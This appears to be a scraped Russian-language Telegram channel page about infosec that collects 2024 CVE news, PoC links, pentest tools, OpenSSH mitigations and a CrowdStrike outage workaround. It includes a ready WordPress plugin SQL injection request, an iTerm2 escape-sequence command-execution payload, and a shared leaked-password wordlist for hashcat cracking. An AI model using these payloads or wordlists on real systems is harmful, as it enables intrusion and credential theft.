SecuriXy.kz
2.48K subscribers
408 photos
16 videos
15 files
312 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Download Telegram
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-30088: Windows LPE

PATCHED: June 11, 2024

https://github.com/tykawaii98/CVE-2024-30088

P.S. Протестил на Win11, работает

#git #exploit #lpe #pentest #redteam
Channel photo updated
Forwarded from APT
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE

The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.

The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.

🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc

#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
SecuriXy.kz
cve-2024-6387-poc.zip
Вот и чекер на питоне подоспел по CVE-2024-6387 (OpenSSH regreSSHion)

https://github.com/xaitax/CVE-2024-6387_Check
Forwarded from Proxy Bar
CVE-2024-36991
*
Splunk /etc/passwd
*
exploit
Для быстрого поиска альясом субиков домена через crt.sh добавляйте альяс в ~/.zshrc


crtsh() {
if [ -z "$1" ]; then
echo "Usage: crtsh <domain>"
return 1
fi
curl -s "https://crt.sh/?q=$1&output=json" --compressed -H 'User-Agent: Mozilla/5.0' | jq -r '.[].common_name,.[].name_value' | sort -u
}

Потом обновите сорсы source ~/.zshrc
Ну и используйте

crtsh DOMAIN.COM
SecuriXy.kz
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.…
Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.

Состояние гонки в функции grace_alarm_handler() создает возможность удаленного выполнения кода в дочернем процессе privsep. Новая уязвимость имеет меньшее непосредственное влияние, но по-прежнему представляет собой значительный риск для безопасности.‍

Patch Now: ‍
В /etc/ssh/sshd_config‍, задайте:

LoginGraceTime 0


Ребутните sshd
systemctl restart sshd


Этот костыль эффективен для устранения обеих уязвимостей CVE-2024-6387 и CVE-2024-6409...
rockyou2024_printable_8-40.7z.002
3.7 GB
🆕Все читали в новостях шумную новость про новый rockyou 2024🆕
https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/

Мы его скачали, немного отфильтровали, а теперь делимся с Вами результатами 😎

ZIP-архив в 45 гигов в распакованном виде выдаёт текстовый файл размером 155 ГБ.

При открытии с помощью less будет уведомление, что он выглядит как бинарный файл. В нём по какой-то причине добавлено приличное количество мусора...

Вычистив его, получаем на выходе файл размером в 144 ГБ. Но даже в нём, достаточно бесполезных строк (Хотя если кому надо, можем выложить и его).

Отфильтровали ещё немного, оставив только строки без пробелов длиной от 8 до 40 символов и вуаля - 25 гигабайт приемлемого вордлиста).

Пользуйтесь 🔥

Количество строк: 1 710 971 198

SHA256:
rockyou2024_printable_8-40.7z.001 B6F5B59C4FAE396BE756942F598C3DC214E1BCCBCD7EC9C8D6A8863B64A96879

rockyou2024_printable_8-40.7z.002 DEA89C6F60959BE704778A441DD0F9680161B28BB3F4C51E825E06AAA2B37176

#wordlist #rockyou #rockyou2024 #parsed_rockyou #rockyou2024_printable_8_40 #passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Proxy Bar
MSSQL ATTACK TOOL - pentesting MSSQL servers
*
writeUP
*
download

#tools #mssql
#Malwoverview - удобная тулина первого реагирования для поиска угроз, которая выполняет первоначальную и быструю сортировку образцов вредоносного ПО, URL-адресов, IP-адресов, доменов, семейств вредоносных программ, IOC и хэшей. Кроме того, Malwoverview может получать динамические и статические отчеты о поведении, отправлять и загружать образцы с нескольких конечных точек. Одним словом, он работает как клиент для основных существующих песочниц.

Установка и настройка конфига описаны в гите.

https://github.com/alexandreborges/malwoverview?tab=readme-ov-file
#CVE-2024-21007 Weblogic Server RCE & #CVE-2024-21006 unauthorized access to critical data

├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0

https://www.oracle.com/security-alerts/cpuapr2024.html

https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
#Wordlist test
Ребята проделали огромную работу по проверке качества словарей и рулов для #hashcat и представили публичную табличку с результатами и КПД. Рулы для брута в комбинации с нагенеренными пасами под конкретную компанию дают феноменальные результаты. Даже старый добрый rockyou дает к примеру с рулом buka_400k огромный плюс.

Тестите, ставьте лайки 😉

https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=524870023#gid=524870023

https://docs.google.com/spreadsheets/d/1qQNwggWIWtL-m0EYrRg_vdwHOrZCY-SnWcYTwQN0fMk/edit?pli=1&gid=1952927995#gid=1952927995

Чуть позже накидаем сюда https://www.clevergod.net/HashCat-a9f4bde5dc764558858b921b9fd228a6 подробно как генерить словари, как юзать хэшкат и использовать рулы к словарям.
Forwarded from Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player SQLi
*
usage:
GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -
This media is not supported in your browser
VIEW IN TELEGRAM
PoC: #CVE-2024-38396 & #CVE-2024-38395 for iTerm2 arbitrary command execution

Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.


]2;s&open -aCalculator&[21t P1000p%session-changed s
Сегодня мы достигли важного рубежа — нас уже 2019! Мы бесконечно благодарны каждому из вас за поддержку и интерес к кибербезопасности. Ваша активность и вовлеченность вдохновляют нас продолжать делиться знаниями и развиваться.

Спасибо дорогие подписчики, что остаетесь с нами!
Массовый сбой в #Windows на ПК и серверах после обновления сенсоров #CrowdStrike. Оригинал уведомления от CrowdStrike: "Hello everyone - We have widespread reports of BSODs on windows hosts, occurring on multiple sensor versions. Investigating cause. TA will be published shortly. Pinned thread. SCOPE: EU-1, US-1, US-2 and US-GOV-1".

Workaround Steps:

1. Boot Windows into Safe Mode or the Windows Recovery Environment

2. Navigate to the C:\Windows\System32\drivers\CrowdStrike directory

3. Locate the file matching “C-00000291*.sys”, and delete it.

4. Boot the host normally.


https://habr.com/ru/news/829912/

https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue